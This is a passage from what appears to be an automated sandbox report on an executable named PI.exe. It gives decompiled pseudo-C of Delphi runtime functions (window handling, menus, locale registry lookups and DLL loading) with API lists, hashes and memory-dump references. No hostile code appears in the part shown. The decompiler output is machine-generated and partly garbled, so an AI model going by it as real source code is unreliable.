				intOrPtr _t17;
				intOrPtr _t24;
				char _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t31;
				void* _t32;
				intOrPtr _t33;

				_t31 = _t32;
				_t33 = _t32 + 0xfffffff4;
				_v8 = 0;
				_t24 =  *0x476b54; // 0x0
				_v12 = _t24;
				_t25 =  *0x476b60; // 0x0
				_v16 = _t25;
				 *0x476b54 = __eax;
				 *0x476b60 = 0;
				_push(_t31);
				_push(0x44c6cb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t33;
				_push(_t31);
				_push( *[fs:eax]);
				 *[fs:eax] = _t33;
				EnumThreadWindows(GetCurrentThreadId(), E0044C5D8, 0);
				_t13 =  *0x476b60; // 0x0
				_v8 = _t13;
				_pop(_t26);
				 *[fs:eax] = _t26;
				_t27 = 0x44c694;
				 *[fs:eax] = _t27;
				_push(0x44c6d2);
				_t5 =  &_v16; // 0x42ef7e
				 *0x476b60 =  *_t5;
				_t17 = _v12;
				 *0x476b54 = _t17;
				return _t17;
			}

0x0044c629
0x0044c62b
0x0044c633
0x0044c636
0x0044c63c
0x0044c63f
0x0044c645
0x0044c648
0x0044c64f
0x0044c656
0x0044c657
0x0044c65c
0x0044c65f
0x0044c664
0x0044c66a
0x0044c66d
0x0044c67d
0x0044c682
0x0044c687
0x0044c68c
0x0044c68f
0x0044c6af
0x0044c6b2
0x0044c6b5
0x0044c6ba
0x0044c6bd
0x0044c6c2
0x0044c6c5
0x0044c6ca

APIs

GetCurrentThreadId.KERNEL32 ref: 0044C677
EnumThreadWindows.USER32(00000000,0044C5D8,00000000), ref: 0044C67D

Strings

~B, xrefs: 0044C6BA

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CurrentEnumWindows
String ID: ~B
API String ID: 2396873506-157790649
Opcode ID: 73e4e1a1b6c12227e349ce7bbc583cb705b52ea44075890c7d2db7c9450a1e17
Instruction ID: 7c32539eb726ed1d4ae04739d1d36bde6d3191d9a6b0475311cdfb1f963f555f
Opcode Fuzzy Hash: 73e4e1a1b6c12227e349ce7bbc583cb705b52ea44075890c7d2db7c9450a1e17
Instruction Fuzzy Hash: 660196B4A05B04AFE301CF66DD61959BBFAF78A710723C476E808D3750E7386810CA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00427304, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00427304(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x492ac6 != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x492aa4; // 0x427304
					 *0x492aa4 = E00427194(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x492aa4(_t14, _t17);
				}
				return _t19;
			}

0x0042730a
0x0042730d
0x00427317
0x0042733c
0x00427345
0x0042736c
0x0042736c
0x00427319
0x0042731e
0x0042732b
0x00427338
0x00427338
0x00427377

APIs

GetSystemMetrics.USER32 ref: 00427355
GetSystemMetrics.USER32 ref: 00427361

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

Strings

MonitorFromRect, xrefs: 00427319

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect
API String ID: 1792783759-4033241945
Opcode ID: f76343267f8f6e76762aad9361421a78a08c1b4a0823ab219f42e92386d770b8
Instruction ID: 2301f00ec9ba7264bd122406a49eefa55d1318e51faeaa851ac3d724eb161a96
Opcode Fuzzy Hash: f76343267f8f6e76762aad9361421a78a08c1b4a0823ab219f42e92386d770b8
Instruction Fuzzy Hash: 5F018F37308124AFDB20CB56EA85B26B755EB90354F9480A3EC04CB716C3B8DC40DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0043DA78, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0043DA78(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				void* _t22;
				void* _t28;

				_v8 = __ecx;
				_t28 = __eax;
				_t22 = 0;
				if(E004428C8(__eax) != 0) {
					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
						E0043DADC(_t28, _t32);
						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
						_t5 =  &_a4; // 0x433c30
						E0043D868(__edx,  *_t5, _v8,  &_v16);
						_t7 =  &_v12; // 0x433c30
						_push( *_t7);
						_push(_v16);
						_push( *((intOrPtr*)(_t28 + 0x6c)));
						L00426A84();
						asm("sbb ebx, ebx");
						_t22 = __edx + 1;
					}
				}
				return _t22;
			}

APIs

Part of subcall function 0043DADC: 734518F0.COMCTL32(?,00000000,0043DAA1,00000000,00000000,00000000), ref: 0043DAF4

Part of subcall function 0043D868: ClientToScreen.USER32(?,0043DB24), ref: 0043D880
Part of subcall function 0043D868: GetWindowRect.USER32 ref: 0043D88A

73451850.COMCTL32(?,?,0<C,?,00000000,00000000,00000000), ref: 0043DAC3

Strings

0<C, xrefs: 0043DAAA
0<C, xrefs: 0043DAB7, 0043DABA

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: 73451873451850ClientRectScreenWindow
String ID: 0<C$0<C
API String ID: 1718620977-3472436047
Opcode ID: 00d106f936de75d0ca9e3580eacffe505f31c1e9111c2a916bad47f52e8b8bc8
Instruction ID: 77f9182041267edf6f7985351eac1890907fc28c30f9b3144ecc59025aa47a15
Opcode Fuzzy Hash: 00d106f936de75d0ca9e3580eacffe505f31c1e9111c2a916bad47f52e8b8bc8
Instruction Fuzzy Hash: 4EF04F72B042086B8710EEDE99C189EF3ACEB4D224B44457AF518D3341D674AE058795

Uniqueness

Uniqueness Score: -1.00%

Function 00456188, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00456188(int __eax) {
				int _t4;
				int _t11;

				_t4 = __eax;
				_t11 = __eax;
				_t12 =  *((intOrPtr*)(__eax + 0x84));
				if( *((intOrPtr*)(__eax + 0x84)) != 0) {
					_t4 = E0043C4F8(_t12);
					if(_t4 != 0) {
						_t4 = IsWindowVisible(E0043C1F4( *((intOrPtr*)(_t11 + 0x84))));
						if(_t4 != 0) {
							return ShowWindow(E0043C1F4( *((intOrPtr*)(_t11 + 0x84))), 0);
						}
					}
				}
				return _t4;
			}

0x00456188
0x0045618a
0x0045618c
0x00456194
0x00456198
0x0045619f
0x004561ad
0x004561b4
0x00000000
0x004561c4
0x004561b4
0x0045619f
0x004561cb

APIs

IsWindowVisible.USER32(00000000), ref: 004561AD
ShowWindow.USER32(00000000,00000000,?,dZG,004561DC,00000000,004552C7,?,?,dZG,00000001,00455387,?,?,?,dZG), ref: 004561C4

Strings

dZG, xrefs: 00456188

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ShowVisible
String ID: dZG
API String ID: 4185057100-410245891
Opcode ID: e7b5841ee6f6c1e4db26ffb880ef901477c0ab628b67a40c463d79075b649659
Instruction ID: d8f9f2cca3db28591ab6c68512187d621f030eca5fe2269429791bb322129600
Opcode Fuzzy Hash: e7b5841ee6f6c1e4db26ffb880ef901477c0ab628b67a40c463d79075b649659
Instruction Fuzzy Hash: A9E0867170051147DE107A664DC2BAB13485F04709F0515BFBD04FF247CE2C9C0857B8

Uniqueness

Uniqueness Score: -1.00%

Function 00445904, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00445904(void* __eax) {
				void* _t16;
				intOrPtr _t17;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
					_t17 =  *0x4445d8; // 0x444624
					if(E00403768( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
					} else {
						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
					}
					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
						E004449B8();
					}
					E004456A0(_t16);
				}
				return  *((intOrPtr*)(_t16 + 0x34));
			}

0x00445905
0x0044590b
0x00445910
0x0044591d
0x0044592e
0x0044591f
0x00445924
0x00445924
0x00445935
0x0044593c
0x0044593c
0x00445943
0x00445943
0x0044594c

APIs

CreatePopupMenu.USER32(?,00445617,00000000,00000000,0044565B), ref: 0044591F
CreateMenu.USER32(?,00445617,00000000,00000000,0044565B), ref: 00445929

Strings

$FD, xrefs: 00445910

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMenu$Popup
String ID: $FD
API String ID: 257293969-395794980
Opcode ID: c42990e1ece9b77a869a2c24865aef1475e0a8e19f72d0e0a11d00286e18dabd
Instruction ID: 615b8956163de8ceb6ed4c4d63f0af774e49576ecaa566ce70806b744e89d49a
Opcode Fuzzy Hash: c42990e1ece9b77a869a2c24865aef1475e0a8e19f72d0e0a11d00286e18dabd
Instruction Fuzzy Hash: 0DE0C9B0606600CBDF50EF35D6C17053BA8AF49325F81647BA8419B35BC678DC909718

Uniqueness

Uniqueness Score: -1.00%

Function 00433938, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00433938(struct tagPOINT* __eax) {
				struct HWND__* _t8;
				void* _t9;

				_push(__eax->y);
				_t8 = WindowFromPoint( *__eax);
				if(_t8 != 0) {
					while(E004338F0(_t8, _t9) == 0) {
						_t8 = GetParent(_t8);
						if(_t8 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				return _t8;
			}

0x00433939
0x00433943
0x00433947
0x00433949
0x0043395a
0x0043395e
0x00000000
0x00000000
0x00000000
0x0043395e
0x00433949
0x00433960
0x00433963

APIs

WindowFromPoint.USER32(!8C,?,00000000,0043351A,?,-0000000C,?), ref: 0043393E

Part of subcall function 004338F0: GlobalFindAtomA.KERNEL32 ref: 00433904
Part of subcall function 004338F0: GetPropA.USER32 ref: 0043391B

GetParent.USER32(00000000), ref: 00433955

Strings

!8C, xrefs: 0043393C

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomFindFromGlobalParentPointPropWindow
String ID: !8C
API String ID: 3524704154-1048860948
Opcode ID: 717da5122212638534d5f3e45181042c5750e76ed7600246d49431436172db62
Instruction ID: 4c313ab1c757ff2f6f8bd9fc01bff25691d4aec51474bd066117046bba4851c4
Opcode Fuzzy Hash: 717da5122212638534d5f3e45181042c5750e76ed7600246d49431436172db62
Instruction Fuzzy Hash: 7AD09EA13093069AAB113EEA5CC161625895F18619B01207F76456A313DBADDD18121D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PI.exe PID: 6744 Parent PID: 6776 PI.exeCOMMON

Executed Functions

Function 00405CA0, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00405CA0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x405da5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00405AE8( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405F0C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00405DAC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401338();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401340();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401338();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401338();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401338();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047608C,?,00405A90,00400000,?,00000105,00000001,004104AC,00405ACC,00406578,0000FF99,?), ref: 00405CBC
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047608C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047608C), ref: 00405CF8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF

Strings

Software\Borland\Locales, xrefs: 00405CD0, 00405CEE
Software\Borland\Delphi\Locales, xrefs: 00405D0C

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
Instruction ID: 04e7f70bc9d5a93712b3d4866678576dafef9722c20d67039ec14452820f7b6a
Opcode Fuzzy Hash: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
Instruction Fuzzy Hash: D2516D71A4060C7AFB21D6A4CC46FEFBAACDB04744F5041B7BA44F65C1E6789E448FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00454858, Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00454858(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t245;
				struct HWND__* _t249;
				struct HWND__* _t251;
				struct HWND__* _t252;
				struct HWND__* _t264;
				intOrPtr _t267;
				struct HWND__* _t270;
				intOrPtr* _t271;
				struct HWND__* _t279;
				struct HWND__* _t281;
				struct HWND__* _t292;
				void* _t301;
				signed int _t303;
				struct HWND__* _t309;
				struct HWND__* _t310;
				struct HWND__* _t311;
				void* _t312;
				intOrPtr _t335;
				struct HWND__* _t339;
				intOrPtr _t361;
				void* _t365;
				struct HWND__* _t370;
				void* _t371;
				void* _t372;
				intOrPtr _t373;

				_t312 = __ecx;
				_push(_t365);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t372);
				_push(0x454ee8);
				_push( *[fs:edx]);
				 *[fs:edx] = _t373;
				 *(_v12 + 0xc) = 0;
				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t301 < 0) {
					L5:
					E0045470C(_v8, _t312, _v12);
					_t303 =  *_v12;
					_t161 = _t303;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L99:
									_t166 = 0;
									_pop(_t335);
									 *[fs:eax] = _t335;
									goto L100;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E004567B0(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
								} else {
									L98:
									E004547D0(_t372); // executed
								}
								goto L99;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E00455454(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E004553F8(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L99;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t339 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
										_t191 = E0044C778(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L99;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L88:
								E00455938(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t367 = _t197;
								_t199 = E0043C1F4(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0043C1F4(_t367));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0043C1F4(_t367));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x476b48 = 0;
											_t206 = GetFocus();
											SetFocus(E0043C1F4(_t367));
											E00436D28(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x476b48 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L99;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0xf2));
								if( *((short*)(_t217 + 0xf2)) != 0) {
									 *((intOrPtr*)(_v8 + 0xf0))();
								}
								goto L99;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E004552D0(_v8, _t312, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0xfa));
							if( *((short*)(_t224 + 0xfa)) != 0) {
								 *((intOrPtr*)(_v8 + 0xf8))();
							}
							goto L99;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E00454F4C(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E00454FFC(_v8);
								} else {
									E004547D0(_t372);
								}
							}
							goto L99;
						}
						__eflags = _t227 + 0xffffffe0 - 7;
						if(_t227 + 0xffffffe0 - 7 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						goto L88;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t245 = _t161 - 0x37;
							__eflags = _t245;
							if(_t245 == 0) {
								 *(_v12 + 0xc) = E00454F30(_v8);
								goto L99;
							}
							__eflags = _t245 == 0x13;
							if(_t245 == 0x13) {
								_t249 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
									_t251 = _v8;
									__eflags =  *((char*)(_t251 + 0x9e));
									if( *((char*)(_t251 + 0x9e)) != 0) {
										_t252 = _v8;
										__eflags =  *(_t252 + 0xa0);
										if( *(_t252 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t309 = E0040BBA4("vcltest3.dll", _t303, 0x8000);
											 *(_v8 + 0xa0) = _t309;
											__eflags = _t309;
											if(_t309 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t310 = _t370;
												__eflags = _t370;
												if(_t370 != 0) {
													_t264 =  *(_v12 + 8);
